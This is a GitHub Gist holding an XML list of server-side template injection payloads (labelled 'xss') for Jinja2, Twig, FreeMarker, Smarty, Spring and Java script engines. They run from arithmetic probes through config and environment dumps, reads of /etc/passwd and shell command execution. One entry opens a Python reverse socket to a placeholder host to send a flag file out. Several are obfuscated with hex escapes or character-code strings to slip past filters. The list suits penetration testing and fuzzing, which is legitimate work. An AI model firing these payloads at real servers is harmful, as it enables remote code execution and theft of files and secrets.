Last active
September 17, 2021 11:06
-
-
Save affix/9d90ea4db7537dbb8b4dcc68e766a564 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xss> | |
| <attack> | |
| <name>0</name> | |
| <code>{{2*2}}[[3*3]]</code> | |
| </attack> | |
| <attack> | |
| <name>1</name> | |
| <code>{{3*3}}</code> | |
| </attack> | |
| <attack> | |
| <name>2</name> | |
| <code>{{3*'3'}}</code> | |
| </attack> | |
| <attack> | |
| <name>4</name> | |
| <code>${6*6}</code> | |
| </attack> | |
| <attack> | |
| <name>5</name> | |
| <code>${{3*3}}</code> | |
| </attack> | |
| <attack> | |
| <name>6</name> | |
| <code>@(6+5)</code> | |
| </attack> | |
| <attack> | |
| <name>7</name> | |
| <code>#{3*3}</code> | |
| </attack> | |
| <attack> | |
| <name>8</name> | |
| <code>#{ 3 * 3 }</code> | |
| </attack> | |
| <attack> | |
| <name>9</name> | |
| <code>{{dump(app)}}</code> | |
| </attack> | |
| <attack> | |
| <name>10</name> | |
| <code>{{app.request.server.all|join(',')}}</code> | |
| </attack> | |
| <attack> | |
| <name>11</name> | |
| <code>{{config.items()}}</code> | |
| </attack> | |
| <attack> | |
| <name>12</name> | |
| <code>{{ [].class.base.subclasses() }}</code> | |
| </attack> | |
| <attack> | |
| <name>13</name> | |
| <code>{{''.class.mro()[1].subclasses()}}</code> | |
| </attack> | |
| <attack> | |
| <name>14</name> | |
| <code>{{ ''.__class__.__mro__[2].__subclasses__() }}</code> | |
| </attack> | |
| <attack> | |
| <name>15</name> | |
| <code>{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}</code> | |
| </attack> | |
| <attack> | |
| <name>16</name> | |
| <code>{{'a'.toUpperCase()}} </code> | |
| </attack> | |
| <attack> | |
| <name>17</name> | |
| <code>{{ request }}</code> | |
| </attack> | |
| <attack> | |
| <name>18</name> | |
| <code>{{self}}</code> | |
| </attack> | |
| <attack> | |
| <name>21</name> | |
| <code>[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}</code> | |
| </attack> | |
| <attack> | |
| <name>22</name> | |
| <code>${"freemarker.template.utility.Execute"?new()("id")}</code> | |
| </attack> | |
| <attack> | |
| <name>23</name> | |
| <code>{{app.request.query.filter(0,0,1024,{'options':'system'})}}</code> | |
| </attack> | |
| <attack> | |
| <name>24</name> | |
| <code>{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}</code> | |
| </attack> | |
| <attack> | |
| <name>25</name> | |
| <code>{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}</code> | |
| </attack> | |
| <attack> | |
| <name>26</name> | |
| <code>{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}</code> | |
| </attack> | |
| <attack> | |
| <name>27</name> | |
| <code>{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}</code> | |
| </attack> | |
| <attack> | |
| <name>28</name> | |
| <code>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}</code> | |
| </attack> | |
| <attack> | |
| <name>29</name> | |
| <code>{$smarty.version}</code> | |
| </attack> | |
| <attack> | |
| <name>30</name> | |
| <code>{php}echo `id`;{/php}</code> | |
| </attack> | |
| <attack> | |
| <name>31</name> | |
| <code>{{['id']|filter('system')}}</code> | |
| </attack> | |
| <attack> | |
| <name>32</name> | |
| <code>{{['cat\x20/etc/passwd']|filter('system')}}</code> | |
| </attack> | |
| <attack> | |
| <name>33</name> | |
| <code>{{['cat$IFS/etc/passwd']|filter('system')}}</code> | |
| </attack> | |
| <attack> | |
| <name>34</name> | |
| <code>{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}</code> | |
| </attack> | |
| <attack> | |
| <name>35</name> | |
| <code>{{request|attr(["_"*2,"class","_"*2]|join)}}</code> | |
| </attack> | |
| <attack> | |
| <name>36</name> | |
| <code>{{request|attr(["__","class","__"]|join)}}</code> | |
| </attack> | |
| <attack> | |
| <name>37</name> | |
| <code>{{request|attr("__class__")}}</code> | |
| </attack> | |
| <attack> | |
| <name>38</name> | |
| <code>{{request.__class__}}</code> | |
| </attack> | |
| <attack> | |
| <name>39</name> | |
| <code>{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}</code> | |
| </attack> | |
| <attack> | |
| <name>40</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>41</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>42</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>43</name> | |
| <code>{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</code> | |
| </attack> | |
| <attack> | |
| <name>44</name> | |
| <code>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}</code> | |
| </attack> | |
| <attack> | |
| <name>45</name> | |
| <code>${T(java.lang.System).getenv()}</code> | |
| </attack> | |
| <attack> | |
| <name>46</name> | |
| <code>${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}</code> | |
| </attack> | |
| <attack> | |
| <name>47</name> | |
| <code>${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}</code> | |
| </attack> | |
| </xss> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment